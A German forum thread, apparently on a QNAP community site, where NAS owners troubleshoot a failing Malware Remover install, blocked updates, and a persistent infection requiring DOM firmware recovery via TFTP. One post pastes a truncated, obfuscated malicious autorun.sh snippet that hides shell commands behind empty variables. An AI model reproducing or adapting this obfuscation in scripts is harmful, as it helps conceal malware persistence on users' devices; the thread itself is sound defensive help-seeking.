Malware Remover 3.4.0 lässt sich mit Hinweis auf data file error nicht mehr installieren

  • HS 251+ und QTS 4.3.6.0805 der Malware Remover 3.4.0 lässt sich mit Hinweis auf data file error nicht mehr installieren


    Hergang: Erst Mailbenachrichtigung, dass Scan nicht durchgeführt werden konnte, dann Deinstallation und erneute manuelle Installation.

    Ging nicht.


    Außerdem lässt sich seit Tagen Antivirus nicht automatisch aktualisieren. Geht nur noch manuell. Evtl. Zusammenhang?


    Unbenannt-1.jpg

  • Hört sich für mich nach einem Befall an, ist den NAS aus dem Netz erreichbar?

  • Bei mir genau das selbe Fehlerbild.

    Scan funktionierte nicht. Dann Malware Remover gelöscht, weil ich ihn neu installieren wollte. Geht nicht.

    Automatische Aktualisierung Virendefinitionen geht auch nicht. Manuell funktioniert es.

  • Ich habe das System neu aufgesetzt. Auf Werkseinstellungen zurückgesetzt, Platten initialisiert und ein neues Volume angelegt.

    Malware Remover habe ich installiert. Läuft und meldet keine Funde.


    Nach wie vor kann ich jedoch die Virendefinitionen nicht automatisch aktualisieren und auch die Suche nach Firmwareaktualisierungen funktioniert nicht.

    Ich lasse es sein -> keinen Bock mehr.


    Derzeit läuft das Kopieren der Daten aus dem Backup.


    2 Mal editiert, zuletzt von Eckfahne ()

  • Aha. Ich habe mich an den Support gewendet. Mal sehen, was der schreibt.

    Dazu kommt, dass man die App Malware-Remover eigentlich gar nicht für QTS 4.3.6 herunterladen kann.


    Es wird nur 4.3.5 oder 4.4 angeboten. Letzteres Betriebssystem gibt es für mein NAS HS 251+ gar nicht.

  • Ich habe nun Stunden damit verbarcht. Es ist zum Kotzen.


    Zurücksetzen auf Werkseinstellungen, Initialiseren der Festplatten ...


    Alles erfolglos. Solange die autorun.sh diesen Inhalt hat, macht alles keinen Sinn:


    Bash
    #!/bin/sh
    tr${cVWIjcwJGoH}ue; ${vENDhqemu}$'\x74'${cmBuxm}${KzBRB}ype; tru${KNyUuHPREDAPl}e; tru${NkKph}${BOaMsPqmZnBm}e; test${VcJDNGfnPfktFT}; fals${WoGRRMDsRWoigSJ}${HvAB}e; uns${BIMSPQUhvV}e${hcROATKzEZI}t; ${UUwSm}ty${icwSe}${ZDiuzzhZek}pe; co${MfScRHIcb}${SmkC}mman${uEWVQt}d; fa${pFnLXuUAaLbz}ls${fzbAVt}e; f${JZCtVXdm}als${aSgmsNNaxSsNtBb}e${pLvjVwhykNaUPAG}; builti${EhfoXWcaXgRLeWe}n; $HqMFcYIiUZcttGw$""t${BRodCaZlbtKlHa}ype; f${SvvxxVgEA}al${IaeiEg}se; false${bNbDLI}; XHHiCh=t${mJUAWOEjrKa}${VIyNyr}r${ftstpCgTf}


    Leider finde ich keine halbwegs versändliche Anleitung, wie ich das beheben kann, ohne vorher Informatik zu studieren.

    Das, was ich finde, sind Anleitungen, die sich gegenseitig widersprechen.

    Wo befindet sich die versteckte Partition, in der sich die autorun.sh befindet?

    Im NAS oder auf einer der Festplatten?

  • Das Grundsystem ist im DOM und wird dann auf die Platten installiert.

    Wenn also der DOM befallen ist wirst Du ohne ein DOM Recovery vermutlich nicht zum Erfolg kommen.

    Aber Achtung: das DOM Recovery ist abhängig vom verwendeten Modell!

    Also die richtige Vorgehensweise und die richtige Flashdatei verwenden!


    Gruss

  • Vielen Dank.

    genau das ist mein Problem.

    Ich finde eine Vielzahl von Anleitungen, in denen dann häufig steht, dass die jeweils andere Anleitung falsch ist und zum Totalcrash geführt habe.

    Das ist für mich ein großes Wirwarr.


    Gibt es die Möglichkeit, das gegen Entgelt erledigen zu lassen?

    Nachtrag: Ich scheitere schon daran das Recovery Image für 231P zu finden. :(

  • Vielen Dank.

    In dieser Anleitung steht nicht, dass ich eine Tastatur und einen Monitor an das QNAP anschließen muss.


    Alles kann über PC erledigt werden.

    Ist das korrekt?

  • Ja über einen TFTP Upload der Firmware, sehr gut gelöst wie ich finde, das sollte recht fix erledigt sein, ich wünschte meine Be würde das auch so einfach umsetzen können.

  • Also, wenn ich die Anleitung ansehe, sehe ich, dass man schon einen Bildschirm und eine Tastatur anschließen muss.

  • Weiter unten bei x86-based NAS, aber die Anleitung gilt wahrscheinlich nicht für dein Modell (habe ein HS 251+).

    Warum willst du einen Firmware-Recovery durchführen? Was genau geht denn nicht?

    Ich aktualisiere meine Firmware nie automatisch, sondern immer über einen separaten Download von Qnap.

  • Meine autorun.sh enthält einen Eintrag, der Malware lädt.

    Leider kann man nicht auf diese autrun.sh zugreifen.


  • Nein musst du nicht Eckfahne. Das ist dein PC auf dem der TFTP-Server läuft. Dem gibst du ja eine spezielle IP-Adresse. Am besten machst du das mit einem kleinen Switch wo nur dein PC und das NAS angeschlossen ist.

  • Weil er einen Virus auf dem DOM hat und das überschreiben muss, sonst kann er so viele neue Firmware Versionen einspielen wie er will und so viel neue HDs einbauen wie Sagate und WD herstellen können.

    Der Virus wird bei jedem Bootvorgang geladen und schreibt sich dann auf die HDs und in den RAM wo er dann seinem Tagewerk nach geht, wie es sich für eine gute Schadsoftware gehört.


    @Eckfahne

    Da alle Gbit LAN Karten Autocross machen, kannst du die auch mit einem Lan Kabel direkt verbinden.

    Per WLAN kannst du dann weiter Surfen und die Firmware laden oder eine Video schauen bis der Download durch ist.

    TFTP ist halt nicht das schnellste.

  • Wie kann ich sehen, dass evtl. auch meine autorun.sh einen solchen Eintrag hat?


    Außerdem würde mich interessieren, was genau der Virus eigentlich macht, außer, dass er verhindert, dass die Virendefinitionen geladen und der MalWareRemover installiert werden kann.


    Ein Scan der Ordner mit den wichtigen Daten durch Bitdefender hat nichts finden können.

    Einmal editiert, zuletzt von mw1972 ()